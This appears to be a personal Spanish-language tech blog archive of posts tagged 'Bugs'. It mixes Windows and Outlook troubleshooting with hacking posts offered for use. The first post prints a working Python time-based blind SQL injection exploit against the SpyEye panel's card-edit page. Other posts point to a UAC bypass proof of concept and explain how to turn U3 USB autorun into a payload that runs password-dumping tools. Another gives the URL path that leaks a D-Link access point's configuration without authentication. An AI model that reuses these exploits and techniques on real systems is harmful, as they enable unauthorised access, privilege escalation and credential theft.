Mostrando entradas con la etiqueta Bugs. Mostrar todas las entradas
Mostrando entradas con la etiqueta Bugs. Mostrar todas las entradas

martes, 20 de septiembre de 2011

Descubierta Vulnerabilidad en Spyeye

SpyEye es un malware con capacidades de puerta trasera que intenta robar información sensible relacionada con la banca en línea y las transacciones de tarjetas de crédito de la máquina infectada. SpyEye se vende a través de su autor en un formato fácil de configurar forma de kit, que contiene el ejecutable del troyano en sí, el mando y control (C & C) del servidor y la configuración básica para orientar sitios web de banca. A partir de principios de 2011, SpyEye se ha fusionado la funcionalidad de la familia troyano Zeus, que ha sido vendida al autor SpyEye, y ahora es cada vez más sofisticados en lo que respecta a las características y funcionalidad,En agosto de el 2011 se libero el codigo. En agosto de el 2011 se libero el código fuente de el malware y 1 mes mas tarde ya tenemos la primera vulnerabilidad con el primer exploit generado , afecta a las siguientes firmas :


Trojan-Spy.Win32.SpyEyes.evg (Kaspersky)
PWS-Spyeye.m (McAfee)
Trojan:Win32/EyeStye.H (Microsoft)
A variant of Win32/Spy.SpyEye.CA (NOD32)
W32/Malware.QOOC (Norman)
Trojan.Zbot (Symantec)
Mal_Xed-24 (Trend Micro)



Python Code: fuente

from httplib import HTTPConnection from time import time from sys import exit, argv, stdout import urllib  print """   Example:                                                           Spypwned 192.168.0.12 /directorio/ "version()"                           """   if len(argv)<=3: exit() else:   print "[+]Iniciando..."   host = argv[1] path = argv[2] sql = argv[3] port = 80    hash = "" full = []   for k in range(48,122):      full.append(k) full.append(0) # full vale [48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 0] # Es el charset a probar  delay = 0.5 a=1  while a <= 32:     for i in full:         j = 0         if i == 0:  exit('\n[+]FIN\n')         #         start = time()         # hora de inicio para el delay         conn = HTTPConnection(host,port)         #values = { "id" : "1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((4.0.5),a,1)),0)="K"),BENCHMARK(9000000,SHA1(1)),1));-- /*" }         values = { "id" : "1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((" + sql + ")," + str(j) + ",1)),0)=" + str(i) + "),BENCHMARK(9000000,SHA1(1)),1));-- /*" }         data = urllib.urlencode(values)         print data         conn.request("GET", path + "frm_cards_edit.php?" + data )         response = conn.getresponse()         read = response.read()              print read                   if response.status == 404: exit('[+]404')         # da 404 luego termina         now = time()         if now - start > delay:         # ha salido true luego el caracter es valido             stdout.write(chr(i))             stdout.flush()             hash += chr(i)             a += 1             break;         else: j += 1         print "i vale %s, y J vale %s" %(i,j)


Tambien disponemos de un tracker , que nos avisa en todo momento los bots que hay conectados a la red , direcciones , nacionalidades y estados.

jueves, 16 de diciembre de 2010

Windows Vista/7 UAC Bypass Exploit

Exploit en el UAC de windows 7 y vista, para ganar la preciada cuenta system escalando permisos desde una cuenta limitada o estandar , para usarlo es muy facil simplemente nos bajamos la app (dentro viene un video que lo explica bien claro xD) , abrimos una consola y lo ejecutamos (poc.exe) , ganando permisos completos para todo el windows (probado en cuentas restringidas y de administracion.)
descargar desde la fuente

martes, 8 de junio de 2010

Vulnerabilidad Usb U3

El ataque se basa en la opción de autorun que hasta el sp3 de el windows xp venia activado por defecto ,esta opción afecta a cualquier dispositivo CD/USB que sea introducido en el ordenador ejecutando el fichero autorun.inf , teniendo esto en cuenta se puede modificar el autorun.inf para ejecutar lo que queramos. Algunos USB al introducirlos te crean la unidad virtual U3 sin preguntar ni naa, bueno la idea es modificar la memoria U3 (por llamarla de alguna forma) de estos USB y modificarla a nuestro gusto , bien para eso existe la app Universal U3 Launch pad, que sirve para pasarle al USB una iso ya modificada a nuestro gusto , para eso tenemos un pack de herramientas (pwdump, mailpassview,etc) ya automatizado y comprimido en una iso, esa iso se encuentra en la applicacion swichblade solo teneis que copiarla de el swichblade a la carpeta bin de el Universal U3 launch pad y lo ultimo seria copiar el archivo SBconfig.exe en la carpeta raiz de el USB y activarlo, despues lanzamos el Universal , automaticamente te hara un backup y sobrescribira tu memoria U3 en el USB.

fuente mejor explicada xDD
contraseña : appstrike

miércoles, 7 de octubre de 2009

hackmeeting maravillas

Los días 9, 10, 11 y 12 de Octubre llegará el Hackmeeting al Patio Maravillas, la decima edicion lleva el nombre de +MADHACK , por supuesto el evento es gratuito , abierto y libre. Si quieres, puedes participar en el hackmeeting proponiendo un Nodo (charla, taller, o lo que sea) o apuntándote a la lista de correo que organiza este evento , para mas informacion este es su blog
fuenT

martes, 1 de septiembre de 2009

Epic Fail

jajajaja , k fuelte!!! no me puedo parar de reir, mira que no conocer a Guybrush Threepwood o LeChack .... pero con lo que me mato es con SCUMM jajajaja que lo busco y le sale que?????

lunes, 20 de abril de 2009

Pt check 09-001

De la mano securitylab.ru nos llega este scanner de vulnerabilidades que scannea las siguientes :

MS08-065
MS08-067
MS09-001


Descargar

lunes, 2 de marzo de 2009

Error raro de gmail

Ultimamente cuando intento entrar en Gmail desde mi puesto de trabajo (salgo a internet por alemania) me sale un error bastante curioso , nos cuentan algo como que no pueden asignar el nombre de gmail en alemania y tampoco pueden redireccionarlo por lo tanto te ponen una url que deberia funcionar, pero no funciona .... , asi que el tema esta asi , no consigo que funcione el gmail :( , ni si quiera por mail.google.com . Por lo que dicen creo que va estar dificil que esto funcione alguna vez (de esta forma,claro) asi que tendre buscar otra entrada (sin proxys) o usar otra conexion xdd

jueves, 8 de enero de 2009

Los *.pst de 2 gigas .....

Bien , pues os voy ha comentar un error que en mi actual empresa pasa cada 2 meses , si teneis el Microsoft Outlook de el Office 2000 como gestor de correo y usais exchange en carpetas personales (todo en un archivo *.pst) que sepais que cuando este file llega ha 1.900,00 mb , casi a los 2 gigas , el cliente de correo se blockea junto con el archivo *.pst , dejanto el correo totalmente muerto , que sepais que no avisa y por supuesto no te lo dice ha las claras , sino que te da mensajes de "no puedo borrar" "no puedo mover" etc . Para arreglarlo :
Hay un scanpst.exe que misteriosamente se instala con el Office 2000(sino esta en el cd), pero no suele funcionar , para "ayudarnos" microsoft ha publicado una herramienta que lo que hace es borrar mensages de el *.pst aleatoriamente....(haz un backuppp) , lo que permite pasarle el scanpst sin problemas (claro te has cepillado unos cuantos mails..)
Recortador de archivos pst

martes, 9 de diciembre de 2008

0000008E Pantallazo azul

Hoy me topado con uno de ellos (cuanto tiempo xd) en mi caso era el 0x0000008E en un win98 (KERNEL_MODE_EXCEPTION_NOT_HANDLED)
y encontrado esta info :

CAUSA: Hardware, drivers o BIOS incompatible. Lo más habitual es RAM defectuosa o drivers de nvidia.

EXPLICACIÓN: Un proceso del kernel ha producido una excepción no procesada por el manejador de excepciones. Es similar al error 0x0000007F.

ARTÍCULOS:
STOP 0x0000008E Error Message During Windows XP Setup
STOP 0x0000008E Error Message Occurs in Wdmaud.sys
STOP 0x0000008E Error Message Occurs When You Change the Hardware Acceleration Setting
STOP 0x0000008E Error Message on a Blue Screen and Your Computer Does Not Enter Hibernation or Standby After You Remove an IEEE 1394 Storage Device
STOP 0x0000008E "Failed To Install Product Catalog" Error Message When You Install Windows XP

en mi pc era la RAM pero por si os sirve de algo os dejo el de 0x0000007F

  • STOP 0x0000007F (UNEXPECTED_KERNEL_MODE_TRAP)

CAUSA: Hardware defectuoso, normalmente RAM o placa base, software incompatible

EXPLICACIÓN: Un proceso del kernel o un driver se ha encontrado que no hay suficiente espacio en el stack para efectuar la operación que pretendía.
Una de las causas más frecuentes es Norton Antivirus (ver información oficial de Symantecaquí)

Para solucionar el error grave 0x0000007F:
Compruebe la Lista de compatibilidad de hardware (HCL) de Microsoft para ver que el hardware y los controladores que tiene instalados son compatibles con Windows 2000. Es posible que el problema se deba a una incompatibilidad con la placa base del equipo.

Para ver la versión más reciente de la lista HCL, visite el sitio Web .

Quite cualquier componente de hardware (memoria RAM, adaptadores, discos duros, módems, etc.) que haya instalado recientemente.
Ejecute el software de diagnósticos del sistema que le haya proporcionado el fabricante del equipo, especialmente la comprobación de memoria.
Deshabilite las opciones de memoria del BIOS, como caché o vigilancia.

ARTÍCULOS:
General Causes of STOP 0x0000007F Errors
STOP 0x0000007F Errors - General Causes
STOP 0x0000007F Error Message or Your Computer Unexpectedly Restarts
STOP 0x0000007F Windows Stops Responding With STOP Error 0x7F
STOP 0x0000007F Computer Turns Off During Text-Mode Setup if it is too hot
STOP 0x0000007F During Setup on Hewlet Packard Pavilion 7840
STOP 0x0000007F on Windows 2000 with InoculateIT Enterprise Edition Installed
STOP 0x0000007F on Windows 2000 Using Veritas Netbackup with Open File Manager Software
Terminal Server Unexpectedly Restarts or You Receive STOP Error 0x0000007F
STOP 0x0000007F Error Message May Be Displayed When the WQuinn QuotaAdvisor 4.1 Program Is Installed

viernes, 12 de septiembre de 2008

bugs graciosos de algunos juegos


jueves, 24 de julio de 2008

Bug en SHLWAPI.DLL

El analista de seguridad telemática Ramón Pinuaga Cascales descubrio un simple código en HTML puro y muy simple , que provoca el cuelgue de cualquier programa que utilice la librería SHLWAPI.DLL (Biblioteca de utilidades de Shell):






Logicamente todo el software que utilice dicha librería puede ser afectado, por lo pronto, ocasiona el bloqueo, además del Internet Explorer, del Outlook y del FrontPage.
Todo esto es debido a que solo sobrescribe un puntero nulo y no afecta al puntero de ejecución del programa, la falla no es fácil de explotar para el lanzamiento de código maligno, pero puede ser utilizada maliciosamente para provocar un reinicio de la computadora y la ejecución de algún programa oculto.No hay parche de Microsoft para esta falla:


fuente

lunes, 7 de julio de 2008

Unauthorize D-Link DWL-2100ap wireless access points access

Vulnerabilidad (un pco vieja la verdad...) via Web con respuesta de TODO el archivo de configuracion de el AP (Probado y funciona!) lo unico que teneis que hacer es escribir esta direccion (http://laipdetudlink-DWL-2100ap/cgi-bin/Intruders.cfg ) en el navegador, guardar el archivo y abrirlo con un editor de texto normal.
Solucion: Actualizar el Firmware desde la web de Dlink